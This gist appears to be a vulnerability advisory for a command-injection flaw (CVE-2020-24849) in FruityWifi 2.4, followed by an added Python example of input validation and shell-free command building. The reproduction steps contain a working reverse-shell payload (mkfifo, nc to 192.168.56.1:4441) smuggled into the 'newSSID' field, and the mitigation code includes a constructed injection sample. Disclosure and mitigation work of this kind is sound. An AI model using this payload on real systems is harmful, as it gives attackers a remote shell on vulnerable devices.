Last active
November 3, 2020 09:20
Revisions
- harsh-bothra renamed this gist (Nov 3, 2020). File renamed without changes.
- harsh-bothra created this gist (Nov 3, 2020).
Product: FruityWifi
CVE: CVE-2020-24849
Version: (, 2.4) - Tested on version 2.4
Vulnerability: Remote Code Execution

Vulnerability Description: A remote code execution vulnerability is identified in FruityWifi through 2.4. Due to improperly escaped shell metacharacters obtained from the POST request at the page_config_adv.php page, it is possible for an authenticated attacker to perform remote code execution. This is similar to CVE-2018-17317.

# Steps to Reproduce:

1. Login with credentials to the application.
2. Go to "https://vuln_ip/scripts/page_config_adv.php".
3. Intercept the request, then change the request method to POST.
4. Add the "newSSID" parameter in the POST body and insert the payload (newSSID=A\"B'C";rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.56.1+4441+>/tmp/f;#), and start an nc listener on port 4441.

Note: In order to bypass, we need to satisfy the quotes, then insert our payload. Send the request and you will be greeted with a shell.
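The bug class behind this advisory is a POST parameter reaching a shell command string unescaped, so a value that closes the open quotes and appends a separator gets parsed as a second command. The block below is an added illustration, not FruityWifi's own code, of the two controls that close that class: an allowlist on the SSID value and shell-free command construction (an argv list with `shell=False`), with quoting via `shlex.quote` shown as the fallback when a shell string is unavoidable. The function names, the `handle_post` shape and the `iw dev wlan0 set ssid` command are assumptions for illustration; only the `newSSID` parameter name comes from the advisory.

```python
"""Added illustration (not FruityWifi's own code) of handling a POST-driven
SSID change without exposing a shell to user input. Names, the form-handling
shape and the `iw` invocation are assumptions."""
import re
import shlex
import subprocess

# Allowlist for an SSID value. 802.11 permits 1..32 octets; this example is
# deliberately stricter so that quotes, ';', '|', '&', '$', '`', '#' and
# newlines can never reach a command line at all.
SSID_PATTERN = re.compile(r"[A-Za-z0-9 _.\-]{1,32}")


def validate_ssid(value: str) -> bool:
    """True only if the whole value matches the allowlist."""
    return SSID_PATTERN.fullmatch(value) is not None


def build_command_unsafe(ssid: str) -> str:
    """The vulnerable pattern: the value is spliced into a shell string, so a
    closing quote followed by ';' ends the intended command. Returned for
    inspection only; never executed in this example."""
    return f'iw dev wlan0 set ssid "{ssid}"'  # hypothetical command


def build_command_quoted(ssid: str) -> str:
    """Mitigation A (escaping): if a shell string is unavoidable, quote the
    value so the shell sees it as one literal word. shlex.quote plays the
    role PHP's escapeshellarg() would play in a PHP handler."""
    return "iw dev wlan0 set ssid " + shlex.quote(ssid)


def build_command_safe(ssid: str) -> list:
    """Mitigation B (preferred): validate, then pass an argv list. With
    shell=False no shell parses the value, so metacharacters are inert."""
    if not validate_ssid(ssid):
        raise ValueError("SSID rejected by allowlist")
    return ["iw", "dev", "wlan0", "set", "ssid", ssid]


def apply_ssid(ssid: str) -> int:
    """Run the hardened command. Not invoked by the tests (needs root and iw)."""
    proc = subprocess.run(build_command_safe(ssid), shell=False, check=False)
    return proc.returncode


def handle_post(form: dict) -> tuple:
    """Minimal stand-in for the POST path of a config page: reject bad input
    with 400 before any command is built. `newSSID` is the parameter name
    from the advisory; the surrounding handler is constructed."""
    ssid = form.get("newSSID")
    if ssid is None:
        return 400, "newSSID missing"
    if not validate_ssid(ssid):
        return 400, "newSSID contains characters outside the allowlist"
    argv = build_command_safe(ssid)
    return 200, "would run: " + shlex.join(argv)


if __name__ == "__main__":
    # Constructed sample input in the same shape as the advisory's payload:
    # a quote-closing prefix, a command separator, and a trailing comment.
    hostile = 'A"B\'C";id;#'
    print("unsafe :", build_command_unsafe(hostile))
    print("quoted :", build_command_quoted(hostile))
    print("handler:", handle_post({"newSSID": hostile}))
    print("handler:", handle_post({"newSSID": "Guest-Net 2"}))
```

Running the script prints the three forms side by side: the unsafe string shows the injected `;` landing outside the quotes, the quoted form shows the same bytes reduced to one literal word, and the handler rejects the value before any command is assembled. Validation before construction is what matters for the config page; quoting alone still leaves the value in a shell-parsed string and is only the fallback.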